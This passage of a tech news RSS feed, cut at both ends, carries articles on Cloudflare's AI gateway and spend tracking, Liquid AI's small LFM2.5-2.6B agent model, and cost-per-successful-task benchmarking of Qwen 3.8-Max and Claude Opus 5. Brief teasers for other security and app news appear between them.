<p class="wp-block-paragraph">Microsoft has marketed the combination of its Azure, Entra, Fabric, Windows, and Microsoft 365 offerings as an operating system of sorts, but hasn’t pulled all the pieces into a common brand, Levy said. And Google’s Gemini, Workspace, Vertex AI, and Cloud Run are “circling similar territory.”</p>



<p class="wp-block-paragraph">But, he noted, Cloudflare OS is “more cohesively bundled” and infrastructure-focused, offering a single pane of glass platform for buyers worried about stitching together otherwise disparate AI-aware networking pieces. The company recognizes that AI introduces new architectural realities such as inference and model routing “over and above” traditional OS core competencies.</p>



<p class="wp-block-paragraph">“While competing offerings generally leave the infrastructure heavy lifting to enterprise decision-makers, Cloudflare is marketing itself as a single-source vendor, which potentially frees IT planners from having to integrate all the AI pieces on their own,” Levy said.</p>



<p class="wp-block-paragraph">An infrastructure-first, application-agnostic approach means Cloudflare OS can coexist with whatever AI applications already exist in an enterprise, he said. It will “play nice” with OpenAI, Anthropic, Google, Microsoft, Meta, or open source layers, allowing employees to begin working in familiar workflows after sign-in.</p>



<p class="wp-block-paragraph">“Its open-source architecture also minimizes the potential for vendor lock-in as enterprises gradually figure out how to evolve their stacks to align with new AI-era realities,” Levy said.</p>



<h2 class="wp-block-heading">Managing identities and budgets for both humans and AI</h2>



<p class="wp-block-paragraph">As AI agents emerge across the enterprise, tracking their use can be challenging, causing problems from both a security and a spend standpoint. Along with Cloudflare OS, the company has launched a way to address this issue with its new <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-gives-companies-full-visibility-to-audit-and-analyze-ai-use/" target="_blank" rel="noreferrer noopener">Identity-Aware AI Gateway</a>, now in beta.</p>



<p class="wp-block-paragraph">Also integrated with Access, the offering gives admins visibility into what users (both human and AI) are requesting from AI models. It allows security teams to set up custom domains in front of their gateways and replace shared API keys by integrating with their identity provider, like Okta or Entra, and ZTNA infrastructure, Cloudflare explained.</p>



<p class="wp-block-paragraph">Every request is tied to Access-verified identities, and enterprises can filter each user’s logs, analytics, and spend. IT teams can track redundancies, limit usage rates, and apply filters that strip out employee names, passwords, and other sensitive data before requests go to outside model providers.</p>



<p class="wp-block-paragraph">A companion feature, AI Spend, tracks every user’s behavior over time to create a baseline of normal AI usage. When spending deviates from that pattern, the system alerts the IT team.</p>



<p class="wp-block-paragraph">A new tab, User Insights, tracks cost and identifies over-spend caused by activities such as low cache-hit rates or oversized context windows. The capability scores sessions and compares them against account history using a 95th percentile session cost over the previous 30 days, Cloudflare product managers <a href="https://blog.cloudflare.com/author/ming-lu/" target="_blank" rel="noreferrer noopener">Ming Lu</a>, <a href="https://blog.cloudflare.com/author/kenny/" target="_blank" rel="noreferrer noopener">Kenny Johnson</a>, and <a href="https://blog.cloudflare.com/author/ayush/" target="_blank" rel="noreferrer noopener">Ayush Kumar</a> explain in a <a href="https://blog.cloudflare.com/identity-aware-ai-gateway/" target="_blank" rel="noreferrer noopener">blog post</a>. Anything above 2x an account’s 95th percentile is a “strong candidate for anomalous behavior.”</p>



<p class="wp-block-paragraph">For instance, one Cloudflare customer had an employee who left a rogue AI session running, generating a $30K bill. “User Insights helped them identify the problem and shut off access before the problem was further exacerbated,” Kozlov said.</p>



<p class="wp-block-paragraph">Cloudflare is also building prompt classification functionality that sorts requests into categories such as coding or writing. This can help enterprises understand what AI is being used for.</p>



<p class="wp-block-paragraph">“Once business traffic is separated from everything else, personal use becomes visible,” the project managers explained. “From the outside, someone running a side hustle on company time and someone quietly moving data out through a model look the same. Telling them apart is central to catching insider risk.”</p>



<h2 class="wp-block-heading">Looking at the bigger picture</h2>



<p class="wp-block-paragraph">Identity-Aware AI Gateway and AI Spend address the visibility problem that has dogged so many recent AI deployments where enterprises failed to monitor usage, Levy noted. Projects “crashed and burned” as users unwittingly blew through token allocations.</p>



<p class="wp-block-paragraph">These platforms provide single-point visibility into what is being used, how it’s being used, and where the potential lies for raising the productivity bar, he said. They overlay with existing models; in doing so, they enhance security with more precise control over resource allocations, and via automated anonymization protocols that prevent inadvertent sharing of sensitive data.</p>



<p class="wp-block-paragraph">Ultimately, he said, vendors who free IT from having to independently assemble the pieces of their own AI implementations, and who assist them with answers to AI-specific questions, “will gain advantage over vendors that aren’t looking at the bigger picture.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[No cloud, no GPUs, no problem: Liquid AI's new model LFM2.5-2.6B brings powerful AI agents to devices as small as a Raspberry Pi]]></title>
<description><![CDATA[Earlier this week, the AI startup Liquid, formed in 2023 by former MIT computer scientists, debuted LFM2.5-2.6B, a new open-weight language model designed specifically for agentic workloads. In release materials and a recent interview with VentureBeat, Liquid's researchers said LFM2.5-2.6B can ru...]]></description>
<link>https://tsecurity.de/de/3709207/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709207/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 02:35:01 +0200</pubDate>
<content:encoded><![CDATA[<p>Earlier this week, the AI startup Liquid, formed in 2023 by former MIT computer scientists, <a href="https://www.liquid.ai/blog/lfm2-5-2-6b">debuted LFM2.5-2.6B</a>, a new open-weight language model designed specifically for agentic workloads. </p><p>In release materials and a recent interview with VentureBeat, Liquid's researchers said LFM2.5-2.6B can run entirely on local hardware — from smartphones and laptops down to a Raspberry Pi — without relying on cloud inference or GPUs, unlocking edge AI applications and giving more options to enterprises working in regulated industries or with sensitive information they don't want to send up to the cloud. </p><p>It's best suited for high-volume, well-defined agentic tasks that run locally — tool calling, document management, calendar and workflow automation, and always-on background routines — and for connectivity-limited environments like vehicles and robotics, though coding-heavy work is better left to larger models.</p><p>Even for those businesses without such concerns, the appeal of running performant, task-specific agents at the cost of essentially electricity, may be enough to make the new model quite appealing. </p><p>But the <a href="https://huggingface.co/LiquidAI/LFM2.5-2.6B/blob/main/LICENSE">custom open weights license</a>, as with <a href="https://venturebeat.com/technology/kimi-k3s-full-weights-are-here-but-theyre-open-with-a-caveat-what-enterprises-should-know">Moonshot's larger frontier model Kimi K3</a> released last month, is worth a close look by enterprise legal teams. </p><h2><b>The basics</b></h2><p>LFM2.5-2.6B contains 2.6 billion parameters, supports a 128,000-token context window, and includes native tool calling. The somewhat tricky name is explained by the generation of model (2.5) combined with the parameter count (2.6B).  </p><p>Both the post-trained model and a base checkpoint (LFM2.5-2.6B-Base) for developers who want to fine-tune it are available now on <a href="https://huggingface.co/LiquidAI/LFM2.5-2.6B">Hugging Face</a>, with day-one support for major inference stacks including llama.cpp, MLX, vLLM, SGLang, and ONNX — positioning it for deployment across consumer hardware, enterprise infrastructure, and embedded systems.</p><p>Liquid also offers an open source fine-tuning framework, <a href="https://github.com/Liquid4All/leap-finetune">LEAP</a>.</p><p>Rather than positioning LFM2.5-2.6B as a competitor to the largest frontier models, the company is making a different argument: that a sufficiently capable small model can unlock categories of enterprise applications where latency, privacy, deployment flexibility, or inference costs matter more than absolute benchmark leadership.</p><p>"I do also believe that the best models will be in the cloud, and there's no problem with that," Maxime Labonne, Liquid AI's head of post-training, told VentureBeat in an interview following the launch. "We want to make models for another type of user, and the best way of describing it is: you should use [edge AI] when you can't use a cloud model."</p><h2><b>Small enough for a Raspberry Pi</b></h2><p>Asked about the minimum viable hardware, Labonne said the model runs "very, very well" on CPUs — and that the LFM2 architecture underlying the model was explicitly designed around real-world CPU performance rather than GPU benchmarks.</p><p>"I think the best example is a Raspberry Pi," he said. "We have a lot of demos that show that actually, it works pretty fast on the Raspberry Pi."</p><p>Company-reported measurements indicate decoding throughput of approximately 220 tokens per second on an Apple M5 Max and 113 tokens per second on an AMD Ryzen AI Max+ 395, while using less than 2.5 GB of memory — and around 30 tokens per second on a smartphone. Users can try the models on their phones through Apollo, Liquid AI's mobile app.</p><p>At the other end of the deployment spectrum, Liquid AI reports the model reaches nearly 15,000 output tokens per second on a single Nvidia H100 GPU under sustained concurrent load — roughly 1.3 billion tokens per day on one card. These figures are vendor benchmarks and have not been independently verified.</p><p>For Labonne, memory footprint and speed are not conveniences but hard constraints that determine what can be deployed at all.</p><p>"What we want to show is that it's a really good trade-off, because you get the level of quality that you get with much bigger models, but in a tiny, tiny form factor," he said. "You can deploy it in target devices where you are not able to deploy the other ones at all."</p><h2><b>Trained for agents instead of chatbots</b></h2><p>Liquid AI says LFM2.5-2.6B was developed around the assumption that language models are increasingly consumed through agent frameworks rather than traditional conversational interfaces.</p><p>"Models are not consumed in chatbots anymore. They're really consumed through agentic harnesses, like OpenClaw, like Hermes Agent," Labonne said. "We wanted to make sure that this model is not just good at math or at code, but it's good at using tools."</p><p>The model is pretrained on approximately 34 trillion tokens, with a vocabulary doubled to 128K to better support non-Latin scripts and a dedicated mid-training phase to extend the context window to 128K tokens for long-running agent workflows.</p><p>Post-training follows a four-stage pipeline: supervised fine-tuning, teacher specialization (training separate expert models for domains like instruction following, math, code, and tool use), multi-domain on-policy distillation (MOPD) to merge those experts' capabilities back into a single student model, and finally agentic reinforcement learning. </p><p>During that last stage, the model was trained directly inside production agent harnesses — including Hermes Agent and OpenClaw — on realistic productivity tasks involving research, coding, document management, tool invocation, and workflow automation, exposing it to those harnesses' actual tools, system prompts, and interaction patterns.</p><p>Labonne described the pipeline overhaul as producing a "happy accident": gains that extended well beyond the agentic targets.</p><p>"Through these new training techniques, we also got a lot better at everything. We got better at math, at instruction following. We've never been good at code, actually — and with this, we even got really good at code," he said.</p><h2><b>Building the model — and the harness</b></h2><p>Notably, Liquid AI also built its own agent harness rather than relying solely on existing frameworks, and demonstrated the model running inside it on a phone, planning and calling tools entirely on-device.</p><p>"This is a harness running on a phone, and I don't know if there's any other harness running on a phone," Labonne said.</p><p>The company had two reasons, he explained. The first was necessity — no phone-native harness existed. The second is a different interaction model: today's harnesses wait for a prompt, and Liquid AI wants assistants that act on their own.</p><p>"We want proactive agents. We want agents that run in the background, check what you're doing, check your calendar, and based on this context, do tasks," he said. "That doesn't exist today, really."</p><p>Co-designing the harness and model also lets the software compensate for the model's weak spots. "Everything that the model is bad at, the harness should help the model with — provide as much assistance as possible to make it more reliable," Labonne said. "End users don't care if it's the model or the harness. What they want is that the task is achieved at the end of the day."</p><p>The model nevertheless works out of the box with established harnesses including Hermes Agent, OpenClaw, and Pi, served behind any OpenAI-compatible endpoint.</p><h2><b>Swap the harness, not the model</b></h2><p>For enterprise deployment, Labonne argued the release marks a shift in what small models can be used for. Until now, he said, local models made economic sense mainly as narrowly fine-tuned specialists — trained to do one thing at cloud-model quality, much faster and cheaper. Agentic capability changes that calculus, because the same model can be repurposed by changing the tools around it rather than the model itself.</p><p>"You can have a calendar assistant, and you can reuse the same model and make a meeting assistant that will record what everybody said and summarize it — a bit like Granola, for example," he said. "You don't change the model; you just change the harness. You just change the tools around it. This gives much more generalizability, and it's a lot easier to do and a lot cheaper as well."</p><p>He still recommends fine-tuning for production deployments whenever feasible: "If you don't fine-tune it, you leave some quality on the table. If you fine-tune it well, it's going to match the performance of GPT and Claude — really, if your task is not the most complex task in the world," he said, adding that the barrier to entry has collapsed: "The bar to be able to do fine-tuning now is super low. It's very accessible to everyone."</p><h2><b>How it stacks up against DeepSeek-V4-Flash, Google's Gemma and Alibaba's Qwen</b></h2><p>Liquid AI released its own benchmark comparison charts pitting LFM2.5-2.6B against the models enterprises are most likely to shortlist for the same edge deployments: Google's Gemma 4 E2B (5.1B parameters) and E4B (8B), and Alibaba's Qwen3.5-4B (4.7B) and Qwen3.5-9B (9.7B). </p><p>A separate test by local AI client platform <a href="https://x.com/atomic_chat_hq/status/2085405031474343963">Atomic Chat</a> found that LFM2.5-2.6B completed 35 tool calls to complete three tasks (checking weather and local time in six cities, converting one budget into six currencies, checking four hotels and booking for a date) 3.7 times faster than DeepSeek-V4-Flash (a whopping 284B parameters), the model has <a href="https://x.com/natolambert/status/2084790959636922652?s=20">skyrocketed</a> to the top of <a href="https://openrouter.ai/rankings#top-models">OpenRouter</a> since its release last week. </p><div></div><p>Gemma 4's small models are multimodal generalists, accepting image and audio input alongside text, and use a Per-Layer Embeddings design that keeps only a fraction of their weights active per token — which is why Google markets them by "effective" size (2.3B and 4.5B) despite total footprints of 5.1B and 8B. Alibaba's Qwen3.5 small series, <a href="https://venturebeat.com/technology/alibabas-small-open-source-qwen3-5-9b-beats-openais-gpt-oss-120b-and-can-run">released in March</a>, is natively multimodal from 4B up and leans on scaled reinforcement learning to chase frontier-style reasoning — Alibaba touts the 9B model as matching or beating OpenAI's far larger gpt-oss-120B on reasoning benchmarks.</p><p>LFM2.5-2.6B takes a narrower path: it is text-only, dense, and specialized for agentic work, with Liquid AI shipping separate vision and audio variants of the LFM family rather than folding everything into one checkpoint. </p><p>Where Qwen's post-training reinforcement learning targets reasoning, Liquid's targets tool use inside real agent harnesses. </p><p>The result, per the company's published numbers, is that the smallest model in the comparison leads every instruction-following benchmark (IFBench, Multi-IF, IFStruct) and nearly every tool-use benchmark — 77.83 on ToolSandbox versus 76.44 for Qwen3.5-9B, a model nearly four times its size — trailing only that 9B model on BFCLv4. </p><p>On agentic evaluations it beats both Gemma models across the board and essentially ties the Qwens: 26.89 on BrowseComp+ versus 27.23 for Qwen3.5-9B. It also posts the best score on AA Omniscience, a knowledge benchmark that penalizes hallucination.</p><p>The Qwen models keep the edge where their training focus lies: math (Qwen3.5-9B leads AIME25) and coding, where larger models retain an advantage on LiveCodeBench — though Labonne noted the gap is smaller than the parameter counts would suggest.</p><p>"With LiveCodeBench v6, we might not be the best among these models, but we're also by far the smallest. Showing that we're competitive with them is already quite a big win for me," he said.</p><p>One differentiator cuts the other way: licensing. Gemma 4 and Qwen3.5 ship under the permissive Apache 2.0 license — <a href="https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter">a change Google made specifically to court enterprises</a>. DeepSeek-V4-Flash ships <a href="https://huggingface.co/datasets/choosealicense/licenses/blob/main/markdown/mit.md">under a similarly permissive MIT License</a>. </p><p>Meanwhile, Liquid AI's revenue-gated license (detailed below) asks larger companies to strike a commercial deal. Enterprises above the threshold are effectively trading license friction for footprint and tool-use performance.</p><h2><b>Licensing reflects a commercial middle ground</b></h2><p>LFM2.5-2.6B is distributed under the <a href="https://huggingface.co/LiquidAI/LFM2.5-2.6B/blob/main/LICENSE">LFM Open License v1.0,</a> which permits use, modification, and redistribution — including commercial use — for organizations with less than $10 million in annual revenue. Commercial use by larger companies is not covered by the license, requiring a separate arrangement with Liquid AI; qualified nonprofits are exempt from the threshold for non-commercial and research purposes.</p><p>Labonne framed the structure as a way to sustain model development — "the models are really the moats, so we need to be sensible in the way that we license them; otherwise, we cannot make money, so we can't make more models" — while characterizing the threshold as a light-touch mechanism in practice.</p><p>Asked how the company would even know if a large enterprise quietly deployed the open weights, he was candid: "I think this is a question for our legal team, but personally, I don't know. And even if you're above $10 million, the only thing that we ask you is to contact us."</p><p>The company pairs its licensed model releases with freely published research, he added, including new structured-output evaluations and a training technique that mitigates the repetition loops common in small models — a failure mode he noted Qwen models are "kind of guilty of."</p><h2><b>Small model, big enterprise implications</b></h2><p>The launch coincided with an announcement from <a href="https://www.liquid.ai/blog/macpaw-partners-liquid-ai-on-device-ai-mac-users">MacPaw</a>, the Ukrainian software company behind CleanMyMac and Setapp, of a long-term strategic partnership with Liquid AI to build an on-device AI stack for the Mac. </p><p>Liquid AI will design and fine-tune foundation models for Eney, MacPaw's macOS assistant, running locally on Apple silicon through MacPaw's Elix inference engine and Mnemos memory layer, with results expected later this year.</p><p>Labonne pointed to the deal as a concrete validation of the size argument: "One of the reasons why they chose us is also because the model is quite small, and they don't have all the memory budget to run the other models."</p><p>The release arrives as hardware vendors, operating system developers, and enterprise software companies increasingly invest in local AI execution — and as agent harnesses proliferate across the industry. Liquid AI's bet is that deployment economics, not raw scale, will define an important segment of that market: agents running continuously, everywhere, at zero marginal token cost.</p><p>Whether small, highly optimized agent models become a significant segment of enterprise AI will ultimately depend less on benchmark scores than on operational reliability. But Liquid AI's latest release suggests the next competitive frontier is no longer simply building larger models — it's building models small enough, and capable enough, to run wherever enterprise workflows already live.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Glaze: Update bringt App-Remixing & mehr]]></title>
<description><![CDATA[Das Raycast-Team hat ein neues Update für die Vibe-Coding-App Glaze veröffentlicht. Nutzer können beschreiben, was sie gerne von der App benötigen, und Glaze erzeugt daraus eine...Zum Beitrag: Glaze: Update bringt App-Remixing & mehr

Wo du uns folgen kannst:
Facebook, Reddit, Google News, X, Thr...]]></description>
<link>https://tsecurity.de/de/3709149/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709149/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 02:34:01 +0200</pubDate>
<content:encoded><![CDATA[<div><img width="720" height="360" src="https://stadt-bremerhaven.de/wp-content/uploads/2026/08/remixing-hero-720x360.webp" class="attachment-medium size-medium wp-post-image" alt="Glaze: Update bringt App-Remixing &amp; mehr" decoding="async" fetchpriority="high" srcset="https://stadt-bremerhaven.de/wp-content/uploads/2026/08/remixing-hero-720x360.webp 720w, https://stadt-bremerhaven.de/wp-content/uploads/2026/08/remixing-hero-768x384.webp 768w, https://stadt-bremerhaven.de/wp-content/uploads/2026/08/remixing-hero.webp 1200w" sizes="(max-width: 720px) 100vw, 720px"></div>Das Raycast-Team hat ein neues Update für die Vibe-Coding-App Glaze veröffentlicht. Nutzer können beschreiben, was sie gerne von der App benötigen, und Glaze erzeugt daraus eine...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/glaze-update-bringt-app-remixing-mehr/">Glaze: Update bringt App-Remixing &amp; mehr</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ThreatsDay: KI-Agenten, Repo-Vorab-Code und npm-Malware zeigen neue Angriffswege]]></title>
<description><![CDATA[TEL AVIV / LONDON (IT BOLTWISE) – In dieser ThreatsDay-Rundschau rückt vor allem die frühe Code-Ausführung vor dem ersten KI-Prompt in den Fokus. Datadog zeigt, dass vertrauenswürdige Repositories in Coding-Agenten bereits beim Klonen unerwünschten Code nachladen können. Gleichzeitig beschreibt d...]]></description>
<link>https://tsecurity.de/de/3709073/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709073/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 21:28:16 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-repo-vorabcode-npm-malware.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-repo-vorabcode-npm-malware.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-repo-vorabcode-npm-malware-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-repo-vorabcode-npm-malware-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-repo-vorabcode-npm-malware-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-repo-vorabcode-npm-malware-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/08/threatsday-ki-agenten-repo-vorabcode-npm-malware-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">TEL AVIV / LONDON (IT BOLTWISE) – In dieser ThreatsDay-Rundschau rückt vor allem die frühe Code-Ausführung vor dem ersten KI-Prompt in den Fokus. Datadog zeigt, dass vertrauenswürdige Repositories in Coding-Agenten bereits beim Klonen unerwünschten Code nachladen können. Gleichzeitig beschreibt die Übersicht eine groß angelegte npm-Supply-Chain-Attacke mit hunderten bösartigen Paketen und weitergehender Verschleierung. Dazu kommen neue […]</p>
<div><a href="https://www.it-boltwise.de/threatsday-ki-agenten-repo-vorab-code-und-npm-malware-zeigen-neue-angriffswege.html">... den vollständigen Artikel <strong>»ThreatsDay: KI-Agenten, Repo-Vorab-Code und npm-Malware zeigen neue Angriffswege«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/threatsday-ki-agenten-repo-vorab-code-und-npm-malware-zeigen-neue-angriffswege.html">ThreatsDay: KI-Agenten, Repo-Vorab-Code und npm-Malware zeigen neue Angriffswege</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Check Point Joins the Open Secure AI Alliance to Advance Open, Measurable and Enterprise-Ready AI Security]]></title>
<description><![CDATA[Check Point brings open research, objective benchmarks and customer-controlled runtime protection to the industry initiative introduced by NVIDIA.  AI is rapidly changing how organizations build, operate, and protect their digital environments. As a leader in the global cyber community, we believ...]]></description>
<link>https://tsecurity.de/de/3709066/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709066/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 21:27:34 +0200</pubDate>
<content:encoded><![CDATA[<img width="1280" height="680" src="https://blog.checkpoint.com/wp-content/uploads/2026/08/agentic-ai-press-osaia-5518050-1280x680-r2.png" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://blog.checkpoint.com/wp-content/uploads/2026/08/agentic-ai-press-osaia-5518050-1280x680-r2.png 1280w, https://blog.checkpoint.com/wp-content/uploads/2026/08/agentic-ai-press-osaia-5518050-1280x680-r2-300x159.png 300w, https://blog.checkpoint.com/wp-content/uploads/2026/08/agentic-ai-press-osaia-5518050-1280x680-r2-1024x544.png 1024w, https://blog.checkpoint.com/wp-content/uploads/2026/08/agentic-ai-press-osaia-5518050-1280x680-r2-768x408.png 768w, https://blog.checkpoint.com/wp-content/uploads/2026/08/agentic-ai-press-osaia-5518050-1280x680-r2-400x213.png 400w" sizes="(max-width: 1280px) 100vw, 1280px"><p>Check Point brings open research, objective benchmarks and customer-controlled runtime protection to the industry initiative introduced by NVIDIA.  AI is rapidly changing how organizations build, operate, and protect their digital environments. As a leader in the global cyber community, we believe in the power of collective intelligence. We are proud to join the Open Secure AI Alliance as an inaugural member, working alongside leaders from across cyber security, cloud computing, enterprise software, AI, and the open-source community.  Introduced by NVIDIA, the alliance is creating a collaborative foundation for developing and sharing open technologies that advance AI safety and security, and will help organizations identify, remediate, and responsibly disclose […]</p>
<p>The post <a href="https://blog.checkpoint.com/ai-security/check-point-joins-the-open-secure-ai-alliance-to-advance-open-measurable-and-enterprise-ready-ai-security/">Check Point Joins the Open Secure AI Alliance to Advance Open, Measurable and Enterprise-Ready AI Security</a> appeared first on <a href="https://blog.checkpoint.com/">Check Point Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Qwen 3.8-Max and Claude Opus 5 show why raw benchmark scores don't predict the bill]]></title>
<description><![CDATA[Alibaba released Qwen 3.8-Max this week and marketed the preview as second only to Claude Fable 5 (their launch-day table was more equivocal: the model leads on one of 12 coding-agent rows). But an independent harness came close to the opposite conclusion: a benchmark run, apparently using the Pr...]]></description>
<link>https://tsecurity.de/de/3709047/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709047/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 21:19:53 +0200</pubDate>
<content:encoded><![CDATA[<p><a href="https://venturebeat.com/technology/qwen3-8-max-arrives-with-a-bold-claim-it-outperforms-gpt-5-6-sol-max-and-fable-5-on-agentic-computer-use">Alibaba released Qwen 3.8-Max</a> this week and marketed the preview as second only to Claude Fable 5 (their <a href="https://qwen.ai/blog?id=qwen3.8">launch-day table</a> was more equivocal: the model leads on one of 12 coding-agent rows). But an independent harness came close to the opposite conclusion: a <a href="https://x.com/morganlinton/status/2084650841152352556">benchmark run</a>, apparently using the Preview version, put Qwen 3.8-Max's best effort setting mid-pack, and its default setting last.</p><p>Both results are real and defensible. The gap between them is about token and time budgets, and that matters because those figures aren’t usually headline numbers. <a href="https://qwen.ai/blog?id=qwen3.8">Alibaba's footnotes</a> give its coding numbers a five-hour timeout, and up to 12 hours per run on PaperBench. The independent harness, VulcanBench, allowed <a href="https://www.vulcanbench.com/benchmarks/10-opus5-effort.html">between 45 and 60 minutes of wall clock time</a>. A time budget between five and 16 times larger on Alibaba’s side explains the huge difference in results.</p><p>It’s time to do two things to start accounting for these differences when choosing models. First, the metric to use is cost per successful task: total spend, including everything you spent on attempts that failed, divided by the tasks that actually passed your acceptance check. Second, you need to make time or token budgets an explicit part of your acceptance criteria, not a hidden detail.</p><h2>Price per token has stopped predicting the bill</h2><p>The comparison everyone published in Qwen 3.8-Max's first week was a price comparison, because that was the only data available. It is not a cheap model. DeepSeek-V4-Flash-0731, which entered public API beta on July 31, <a href="https://api-docs.deepseek.com/quick_start/pricing/">lists at 14 cents per million input tokens and 28 cents output</a>. Qwen 3.8-Max lists at $2 and $6. Kimi K3 sits at $3 and $15.</p><p>Those prices tell you less than they used to, for a reason specific to reasoning models like Qwen: getting to a result costs thinking tokens. A model that spends most of its token allowance on reasoning can reach a token cap before it writes the answer, giving you an empty result indistinguishable from a total failure at the cost of a full run.</p><p>Artificial Analysis has <a href="https://artificialanalysis.ai/models/deepseek-v4-flash">the cleanest published measurement</a> of how this can affect real agent spend: running its Intelligence Index on DeepSeek-V4-Flash at maximum effort took 210 million output tokens against a class median of 100 million. Absolute cost stayed low anyway, because the tokens were so cheap. But verbosity costs time, not just money, and depending on your use case that can sink you.</p><p>What you need is a number that counts everything you spent, including the attempts that came back empty, against the tasks that actually got done in the time and token budget you specified. This is what a cost-per-success metric helps you see.</p><h2>Your failure rate is partly a configuration setting</h2><p>A run that produces a wrong answer and a run that runs out of budget are different events with different fixes. Almost no harness distinguishes them, and almost no leaderboard reports the split. I hit this building <a href="https://arize.com/blog/cost-per-successful-task-ai-model-benchmark">an agent benchmark of my own</a>: the harness logged a failure and nothing about why, and I had to add the distinction myself. When you do separate them, budget exhaustion turns out to dominate.</p><p><a href="https://arxiv.org/abs/2607.08964">Long-Horizon-Terminal-Bench</a>, published in July, ran 17 frontier models across 46 tasks through a shared harness with one 90-minute attempt each. Timeouts accounted for 79% of unresolved runs, against 19% for agents that stopped on their own and 3% for harness errors. The authors are careful about what that does and does not mean: the timed-out runs were not close to finishing, with mean reward between 0.10 and 0.35, so you cannot assume more time would have resulted in success. But the lesson is: benchmarks are implicitly measuring time efficiency, whether or not they shout about that.</p><p>The clearest published example of the mechanism comes from VulcanBench, the same open-source harness behind the Qwen chart. In <a href="https://www.vulcanbench.com/benchmarks/10-opus5-effort.html">a report dated July 26</a>, Claude Opus 5's lowest-effort setting was its best, solving 20 of 23 tasks against 18 at high effort. The extra reasoning wasn’t useless: high effort returned the fewest wrong answers of any setting, one against three. It ran out of clock instead, and a timeout scores zero. Two of its three regressions were cutoffs on tasks that low effort solves, and given unlimited time on both it only ties its cheapest setting, at 3.1 times the cost.</p><p>That has a direct consequence for anyone building a routing ladder. The standard design escalates to more reasoning when a cheap attempt fails, on the assumption that the next rung is better and merely costs more. For a meaningful share of model and task combinations that assumption is wrong, and you pay the higher rung's price to escalate into a timeout or hitting a cap.</p><h2>Who is already measuring this</h2><p>Several groups have landed on cost per successful task independently in the last few months, which is the strongest signal it's becoming standard.</p><p>VulcanBench reports dollars per solved task as a headline column and <a href="https://www.vulcanbench.com/benchmarks.html">has since its earliest reports</a>. Long-Horizon-Terminal-Bench publishes per-task cost next to accuracy, and its most instructive row is GPT-5.4 at roughly $26 per task with a much lower pass rate than Grok 4.5 at about $11. TestEvo-Bench runs agents under a cost cap, and Claude Code's test-generation score falls from 71% to 44% at the tighter cap.</p><p>Vendors are already on board with the idea of measuring per successful task. HubSpot moved its Breeze Customer Agent in April to <a href="https://www.hubspot.com/company-news/hubspots-customer-agent-and-prospecting-agent-now-you-pay-when-the-task-is-complete">50 cents per resolved conversation</a>, down from $1 per handled conversation. <a href="https://support.zendesk.com/hc/en-us/articles/5352026794010-About-automated-resolutions-for-AI-agents">Zendesk bills per automated resolution</a>. Fin charges <a href="https://www.intercom.com/pricing">99 cents per outcome</a> and bills only on end-to-end resolution.</p><h2>What to change this week</h2><ul><li><p>Emit a failure reason on every agent run as a required field, with budget exhaustion, verifier failure and harness error as distinct values rather than one failure flag. Until you can separate a timeout from a wrong answer, your pass rate is measuring two things at once and you cannot tell which one to fix.</p></li><li><p>Compute cost per successful task per effort level, not just per model. Total spend including failed attempts, divided by tasks that passed your acceptance check. The ranking will not match the rate card, and the cheapest setting may well win.</p></li><li><p>Cap on tokens rather than wall clock unless latency is genuinely in your service level objective. A wall-clock cap scores your provider's serving speed as model quality.</p></li><li><p>Check the default effort setting on everything you have deployed. Qwen 3.8-Max runs at its highest reasoning setting <a href="https://qwen.ai/blog?id=qwen3.8">when the effort field is unset</a>, and its highest setting was its worst performer in independent testing. A team that never touches that parameter is running the configuration that costs the most per solved task.</p></li></ul><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Humans in the loop miss a third of dangerous AI coding agent requests]]></title>
